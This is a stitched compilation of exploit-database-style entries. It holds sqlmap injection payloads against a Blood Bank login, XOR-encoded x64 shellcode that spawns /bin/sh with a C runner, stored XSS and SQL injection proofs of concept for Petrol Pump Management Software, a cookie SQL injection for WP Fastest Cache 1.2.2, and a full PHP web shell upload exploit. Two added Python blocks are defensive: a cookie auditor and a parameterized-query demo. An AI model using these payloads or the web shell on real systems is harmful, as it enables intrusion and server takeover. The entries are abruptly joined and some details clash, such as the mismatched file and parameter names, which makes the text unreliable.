sqlmap -u "http://localhost/bloodbank/file/hospitalLogin.php" --method POST --data "hemail=test@test&hpassword=test&hlogin=Login" -p rpassword --risk 3 --level 5 --dbms mysql --batch --current-db

SQLMap Response:
----------------------

---
Parameter: remail (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: remail=test@test' AND 1348=(SELECT (CASE WHEN (1348=1348) THEN 1348 ELSE (SELECT 5898 UNION SELECT 1310) END))-- -&rpassword=test&rlogin=Login

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: remail=test@test' OR (SELECT 9644 FROM(SELECT COUNT(*),CONCAT(0x7170707171,(SELECT (ELT(9644=9644,1))),0x7178706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- HyEh&rpassword=test&rlogin=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: remail=test@test' AND (SELECT 5587 FROM (SELECT(SLEEP(5)))hWQj)-- NUfN&rpassword=test&rlogin=Login

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: remail=test@test' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x4e764e5452486270544a6e4c705a79535a667441756d556b416e7961484a534a647542597a61466f,0x7178706271),NULL,NULL,NULL,NULL,NULL-- -&rpassword=test&rlogin=Login
---

---
Parameter: rpassword (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: remail=test@test&rpassword=test' AND 9149=(SELECT (CASE WHEN (9149=9149) THEN 9149 ELSE (SELECT 9028 UNION SELECT 5274) END))-- -&rlogin=Login

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: remail=test@test&rpassword=test' OR (SELECT 6087 FROM(SELECT COUNT(*),CONCAT(0x7170707171,(SELECT (ELT(6087=6087,1))),0x7178706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VRqW&rlogin=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: remail=test@test&rpassword=test' AND (SELECT 4449 FROM (SELECT(SLEEP(5)))eegb)-- Cuoy&rlogin=Login

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: remail=test@test&rpassword=test' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x6e686d776376736a706f47796d474a736a48566f72625a4e6d537247665a444f684154684b476d62,0x7178706271),NULL,NULL,NULL,NULL,NULL-- -&rlogin=Login
---

-------------------------------------------------------------------------------

# Description:

The lack of proper input validation and sanitization on the 'remail' parameter allows an attacker to craft SQL injection queries, bypassing authentication mechanisms and gaining unauthorized access to the database.

Vulnerable File: /receiverReg.php
Parameter Name: remail

# Proof of Concept:
----------------------

1. Save the POST request of receiverReg.php to a request.txt file

---
POST /bloodbank/file/receiverReg.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------2653697510272605730288393868
Content-Length: 877
Origin: http://localhost
Connection: close
Referer: http://localhost/bloodbank/register.php
Cookie: PHPSESSID=<some-cookie-value>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------2653697510272605730288393868
Content-Disposition: form-data; name="rname"

test
-----------------------------2653697510272605730288393868
Content-Disposition: form-data; name="rbg"

A+
-----------------------------2653697510272605730288393868
Content-Disposition: form-data; name="rcity"

test
-----------------------------2653697510272605730288393868
Content-Disposition: form-data; name="rphone"

05555555555
-----------------------------2653697510272605730288393868
Content-Disposition: form-data; name="remail"

test@test
-----------------------------2653697510272605730288393868
Content-Disposition: form-data; name="rpassword"

test123
-----------------------------2653697510272605730288393868
Content-Disposition: form-data; name="rregister"

Register
-----------------------------2653697510272605730288393868--
---

2. Execute sqlmap using the 'remail' parameter to retrieve the current database:

sqlmap -r request.txt -p remail --risk 3 --level 3 --dbms mysql --batch --current-db
-
(shellcode) Linux-x64 - create a shell with execve() sending argument using XOR (/bin//sh) [55 bytes]
# Exploit Title: Linux-x64 - create a shell with execve() sending argument using XOR (/bin//sh) [55 bytes]
# Shellcode Author: Alexys (0x177git)
# Tested on: Linux (x86_64)
# Shellcode Description: creating a new process using execve() syscall sending bin//sh as argument | (encrypted using XOR operation was QWORD size (/bin - //sh))
# Blog post: @MoreRubyOfSec (https://t.me/MoreRubyOfSec) on Telegram
# Original code: [https://github.com/0x177git/xor-encrypted-execve-sh](https://github.com/0x177git/xor-encrypted-execve-sh/blob/main/execve-xor-encrypted-argv.asm)

---- Assembly code ----

section .text
global _start

_start:
    xor eax, eax
    xor edx, edx                        ; clear rdx (argv on execve() prototype)
    mov qword [rsp-32], 0x7466684b      ;
    mov qword [rsp-28], 0x60650b1d      ; encrypted(/bin//sh) 0x60, 0x65, 0xb, 0x1d, 0x74, 0x66, 0x68, 0x4b
    xor qword [rsp-32], 0x1a0f0a64
    xor qword [rsp-28], 0x08162432      ; passwd 0x8, 0x16, 0x24, 0x32, 0x1a, 0xf, 0xa, 0x64
    lea rdi, [rsp-32]
    push rax                            ; end of string
    push rdi                            ; send string to stack
    mov rsi, rsp                        ; send address of RSP to rsi -> (arg on linux syscall architecture convention) || execve(rsi, rdx)
    ; call execve()
    mov al, 0x3b
    syscall

- - - -

shellcode execution using stack in c ( gcc -z execstack shellcode.c -o shellcode )

----

/*
"\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x31\xc0\xb0\x3b\x0f\x05" ;
*/

int main () {
    const char shellcode [] = "\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x31\xc0\xb0\x3b\x0f\x05" ;
    void ( * f )() = ( void ( * )()) shellcode ;
    f ();
    return 0;
}
-
Petrol Pump Management Software v1.0 - 'Address' Stored Cross Site Scripting
# Exploit Title: Petrol Pump Management Software v1.0 - 'Address' Stored Cross Site Scripting
# Date: 01-03-2024
# Exploit Author: Shubham Pandey
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html
# Version: 1.0
# Tested on: Windows, Linux
# CVE : CVE-2024-27743

# Description: Cross Site Scripting vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the Address parameter in the add_invoices.php component.

# POC:
1. Go to: http://localhost/fuelflow/index.php
2. Log in with the default [email protected] and Password=admin
3. Go to "http://localhost/fuelflow/admin/add_invoices.php"
4. Enter the payload "<script>alert(0)</script>" in the "Address" field
5. The stored XSS fires on the "http://localhost/fuelflow/admin/manage_invoices.php" page

# Reference: https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27743.md
-
WP Fastest Cache 1.2.2 - Unauthenticated SQL Injection
# Exploit Title: Unauthenticated SQL Injection in WP Fastest Cache 1.2.2
# Date: 14.11.2023
# Exploit Author: Meryem Taşkın
# Vendor Homepage: https://www.wpfastestcache.com/
# Software Link: https://wordpress.org/plugins/wp-fastest-cache/
# Version: WP Fastest Cache 1.2.2
# Tested on: WP Fastest Cache 1.2.2
# CVE: CVE-2023-6063

## Description

An SQL injection vulnerability exists in version 1.2.2 of the WP Fastest Cache plugin, allowing an attacker to trigger SQL queries on the system without authentication.

## Vuln Code

public function is_user_admin(){
    global $wpdb;

    foreach ((array)$_COOKIE as $cookie_key => $cookie_value){
        if(preg_match("/wordpress_logged_in/i", $cookie_key)){
            $username = preg_replace("/^([^\|]+)\|.+/", "$1", $cookie_value);
            break;
        }
    }

    if(isset($username) && $username){
        $res = $wpdb->get_var("SELECT `$wpdb->users`.`ID`, `$wpdb->users`.`user_login`, `$wpdb->usermeta`.`meta_key`, `$wpdb->usermeta`.`meta_value`
                               FROM `$wpdb->users`
                               INNER JOIN `$wpdb->usermeta`
                               ON `$wpdb->users`.`user_login` = \"$username\" AND   # $username variable is not escaped: vulnerable to SQL injection
                               .....

## Exploit

GET / HTTP/1.1
Cookie: wordpress_logged_in_1=%22%20AND%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%285%29%29A%29%20AND%20%221%22%3D%221
Host: meryem.local

## Parameter: Cookie #1* ((custom) HEADER)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: wordpress_logged_in_dsadasdasd=" AND (SELECT 3809 FROM (SELECT(SLEEP(5)))RDVP) AND "HQDg"="HQDg
---

## References
- [WPScan Blog Post](https://wpscan.com/blog/unauthenticated-sql-injection-vulnerability-addressed-in-wp-fastest-cache-1-2-2/)
- [WPScan Vulnerability](https://wpscan.com/vulnerability/30a74105-8ade-4198-abe2-1c6f2967443e/)
- [CVE-2023-6063](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6063)

## Credits
- Original Researcher: Alex Sanford
- PoC: Meryem Taşkın
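What makes the cookie above reach the query unchanged is visible in the vulnerable code: any cookie whose name merely contains `wordpress_logged_in` is accepted, and `preg_replace` returns the value untouched when there is no `|` in it, so the whole cookie value becomes `$username`. The block below is an added example, not code from the advisory or from the plugin: it re-implements that extraction in Python so a reverse proxy or log-review script can see exactly what the query would receive, and flags values outside the character set WordPress allows in a login name. The request samples are constructed; the exploit sample is the cookie from the advisory.

```python
"""Added example: spot the cookie shape used by CVE-2023-6063 at the edge.
Not code from the advisory or the plugin; request samples are constructed."""
import re
from typing import Dict, Optional
from urllib.parse import unquote

# The plugin's own extraction, reimplemented: keep everything before the first '|'.
# With no '|' in the value, preg_replace leaves it untouched, so the whole cookie
# value becomes $username. That is what the payload above relies on.
WP_USERNAME_PART = re.compile(r"^([^|]+)\|.+")

# Characters WordPress permits in a login name (sanitize_user in strict mode):
# letters, digits, space, underscore, hyphen, dot, at-sign.
VALID_WP_USERNAME = re.compile(r"^[A-Za-z0-9 _.\-@]+$")


def parse_cookie_header(header: str) -> Dict[str, str]:
    """Split a Cookie header and URL-decode values the way PHP fills $_COOKIE."""
    cookies: Dict[str, str] = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep and name:
            cookies[name] = unquote(value)
    return cookies


def username_seen_by_plugin(cookies: Dict[str, str]) -> Optional[str]:
    """Mirror is_user_admin(): first cookie whose name contains 'wordpress_logged_in'
    (case-insensitive, any suffix), reduced to the part before the first '|'."""
    for name, value in cookies.items():
        if "wordpress_logged_in" in name.lower():
            m = WP_USERNAME_PART.match(value)
            return m.group(1) if m else value
    return None


def audit_cookie_header(header: str) -> Dict[str, object]:
    """Return what the vulnerable query would receive and whether it looks injected."""
    username = username_seen_by_plugin(parse_cookie_header(header))
    suspicious = username is not None and not VALID_WP_USERNAME.match(username)
    return {"username": username, "suspicious": suspicious}


# Constructed samples: a normal login cookie (user|expiry|token|hmac structure)
# and the advisory's exploit cookie.
SAMPLE_HEADERS = {
    "legit": "wordpress_logged_in_1=alice%7C1700000000%7Ctok%7Chmac; wp-settings-time-1=1699",
    "exploit": "wordpress_logged_in_1=%22%20AND%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%285%29%29A%29%20AND%20%221%22%3D%221",
    "anonymous": "PHPSESSID=abc123",
}

if __name__ == "__main__":
    for label, header in SAMPLE_HEADERS.items():
        print(label, audit_cookie_header(header))
```

The plugin-side fix is the usual one, passing `$username` through `$wpdb->prepare()` rather than interpolating it; the character-set check here is an edge-side compensating control only, because a login-name filter cannot know which characters a given query can be broken out of.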
-
Petrol Pump Management Software v.1.0 - Stored Cross Site Scripting via SVG file
# Exploit Title: Petrol Pump Management Software v.1.0 - Stored Cross Site Scripting via SVG file
# Date: 01-03-2024
# Exploit Author: Shubham Pandey
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html
# Version: 1.0
# Tested on: Windows, Linux
# CVE : CVE-2024-27744

# Description: Cross Site Scripting vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the image parameter in the profile.php component.

# POC:
1. Go to: http://localhost/fuelflow/index.php
2. Log in with the default [email protected] and Password=admin
3. Go to "http://localhost/fuelflow/admin/profile.php"
4. Upload the xss.svg file in the "Image" field
5. The stored XSS fires on the "http://localhost/fuelflow/assets/images/xss.svg" page
6. The content of the xss.svg file is given below:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert("XSS by Shubham Pandey");
  </script>
</svg>

# Reference: https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27744.md
-
Petrol Pump Management Software v.1.0 - SQL Injection
# Exploit Title: Petrol Pump Management Software v.1.0 - SQL Injection
# Date: 01-03-2024
# Exploit Author: Shubham Pandey
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html
# Version: 1.0
# Tested on: Windows, Linux
# CVE : CVE-2024-27746

# Description: SQL Injection vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the email address parameter in the index.php component.

# POC:
1. Go to: http://localhost/fuelflow/index.php
2. Log in with username: [email protected]';SELECT SLEEP(10)# and Password=test
3. The page will load for 10 seconds because of the time-based SQL injection

# Reference: https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27746.md
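The Blood Bank login forms above and this Petrol Pump login share one root cause: the email and password fields are spliced into the SQL text, so a quote in either field ends the string literal and the rest of the input becomes part of the query. The block below is an added example, not code from either application: the same login written both ways against an in-memory SQLite table, so the difference can be run rather than read. The schema, the sample account and the tautology input are constructed; SQLite is used in place of MySQL, which is why the demo uses a comment-based tautology instead of the `SLEEP()` payload from the page.

```python
"""Added example: the login pattern behind the SQL injection advisories above,
vulnerable and parameterized side by side. Not code from the Blood Bank or
Petrol Pump applications; the SQLite schema and sample user are constructed."""
import hmac
import sqlite3
from typing import Optional


def build_demo_db() -> sqlite3.Connection:
    """Constructed stand-in for the applications' users table (one account).
    Plaintext password column mirrors these apps; a real table stores a salted hash."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (email TEXT PRIMARY KEY, password TEXT NOT NULL)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("clerk@example.test", "s3cret"))
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, email: str, password: str) -> Optional[str]:
    """The advisories' pattern: request parameters spliced into the SQL text.

    A quote in `email` closes the literal early; what follows is parsed as SQL
    and decides the WHERE clause instead of the credentials."""
    sql = f"SELECT email FROM users WHERE email='{email}' AND password='{password}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, email: str, password: str) -> Optional[str]:
    """Parameterized form: the statement is fixed, the inputs travel as values.

    Whatever `email` contains is compared as a string and cannot alter the
    query. The password is checked in Python with a constant-time compare
    rather than inside SQL, so a near miss costs the same time as a wrong guess."""
    row = conn.execute("SELECT email, password FROM users WHERE email = ?", (email,)).fetchone()
    if row is None or not hmac.compare_digest(row[1], password):
        return None
    return row[0]


# Constructed inputs: honest credentials, and the quote-plus-comment tautology
# shape that the sqlmap output above enumerates in its boolean-based payloads.
HONEST = ("clerk@example.test", "s3cret")
TAUTOLOGY = ("test@test' OR 1=1-- -", "anything")


def compare() -> dict:
    """Run both logins on both inputs; the vulnerable one accepts the tautology."""
    conn = build_demo_db()
    return {
        "vulnerable/honest": login_vulnerable(conn, *HONEST),
        "vulnerable/tautology": login_vulnerable(conn, *TAUTOLOGY),
        "safe/honest": login_safe(conn, *HONEST),
        "safe/tautology": login_safe(conn, *TAUTOLOGY),
    }


if __name__ == "__main__":
    print(compare())
```

In the PHP these applications are written in, `login_safe` corresponds to a PDO or mysqli prepared statement with bound parameters; escaping functions applied by hand are the pattern that produced the advisories above.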
-
Petrol Pump Management Software v1.0 - Remote Code Execution via File Upload
# Exploit Title: Petrol Pump Management Software v1.0 - Remote Code Execution via File Upload
# Date: 01-03-2024
# Exploit Author: Shubham Pandey
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html
# Version: 1.0
# Tested on: Windows, Linux
# CVE : CVE-2024-27747

# Description: File Upload vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the Image parameter in the profile.php component.

# POC:
1. Go to: http://localhost/fuelflow/index.php
2. Log in with the default [email protected] and Password=admin
3. Go to "http://localhost/fuelflow/admin/profile.php"
4. Upload the phpinfo.php file in the "Image" field
5. The phpinfo output will be present on the "http://localhost/fuelflow/assets/images/phpinfo.php" page
6. The content of the phpinfo.php file is given below:

<?php phpinfo();?>

# Reference: https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27747.md
-
Real Estate Management System v1.0 - Remote Code Execution via File Upload
# Exploit Title: Real Estate Management System v1.0 - Remote Code Execution via File Upload
# Date: 2/11/2024
# Exploit Author: Diyar Saadi
# Vendor Homepage: https://codeastro.com
# Version: V1.0
# Tested on: Windows 11 + XAMPP 8.0.30 + Burp Suite Professional v2023.12.1.3

## Description ##

This vulnerability allows the attacker to execute command injection payloads and upload malicious files to the web server.

-----------------------------------------------------------------------------------------------------------------------

## Simple RCE Payload : ##

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system_payload($_GET['cmd']);
    }
?>
</pre>
</body>
</html>

-----------------------------------------------------------------------------------------------------------------------

## Steps to Reproduce ##

1- Open Burp Suite (Community or Professional), click on the Proxy tab, then enable Intercept by clicking "Intercept is off".
2- Open the browser from the Proxy tab, then open the register web page: http://localhost:8080/realestate/register.php
3- Prepare your RCE PHP script in Notepad or any editor, then save the RCE PHP script as: avatar.php
4- After saving the RCE PHP script, change the filename extension to avatar.png.
5- Click "Choose File" in the User Image section, then upload your avatar.png file.
6- Click Register, then go back to the Burp Suite Proxy tab.
7- Modify the file extension back to the original file extension, avatar.php. Example: Content-Disposition: form-data; name="uimage"; filename="avatar.png" / Content-Type: image/png
8- After modifying the Content-Disposition in the Burp Suite Proxy tab to the original file extension, click the Forward button.
9- Open the login page: http://localhost:8080/realestate/login.php, then sign in with your account email & password.
10- From the menu bar click My Account & Profile, then right-click the image icon > Copy Link > New Tab > Paste. Your malicious command is ready to execute.

-----------------------------------------------------------------------------------------------------------------------

## Burp Request : ##

POST /realestate/register.php HTTP/1.1
Host: localhost
Content-Length: 1100
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywA99kZOAu8APGlhv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/realestate/register.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundarypgW90eleiRxRzcEK
Content-Disposition: form-data; name="name"

johnhamosh
------WebKitFormBoundarypgW90eleiRxRzcEK
Content-Disposition: form-data; name="email"

[email protected]
------WebKitFormBoundarypgW90eleiRxRzcEK
Content-Disposition: form-data; name="phone"

+199988764
------WebKitFormBoundarypgW90eleiRxRzcEK
Content-Disposition: form-data; name="pass"

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
</html>
------WebKitFormBoundarypgW90eleiRxRzcEK
Content-Disposition: form-data; name="utype"

user
------WebKitFormBoundarypgW90eleiRxRzcEK
Content-Disposition: form-data; name="uimage"; filename="avatar.php"
Content-Type: image/png

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
</html>
------WebKitFormBoundarypgW90eleiRxRzcEK
Content-Disposition: form-data; name="reg"

Register
------WebKitFormBoundarypgW90eleiRxRzcEK--

-----------------------------------------------------------------------------------------------------------------------

## PoC Simple RCE Through This Vulnerability : ##

 Directory of C:\xampp\htdocs\realestate\admin\user

..
02/11/2024  08:09 PM               315 avatar.php
02/11/2024  08:04 PM               315 avatar.png
02/11/2024  06:54 PM             9,376 avatarm2-min.jpg
02/11/2024  06:54 PM            13,186 avatarm7-min.jpg
02/11/2024  07:47 PM             1,814 avatars.php
02/11/2024  06:54 PM             1,313 gr7.png
02/11/2024  07:36 PM                28 poc.php

-----------------------------------------------------------------------------------------------------------------------

## Video PoC : ##

1- https://github.com/vulnerablecms/RCE-RealEstateVIDEOPOC/blob/main/PoC-RCE.mp4
2- https://gofile.io/d/AEWEgI

-----------------------------------------------------------------------------------------------------------------------

Greetz !
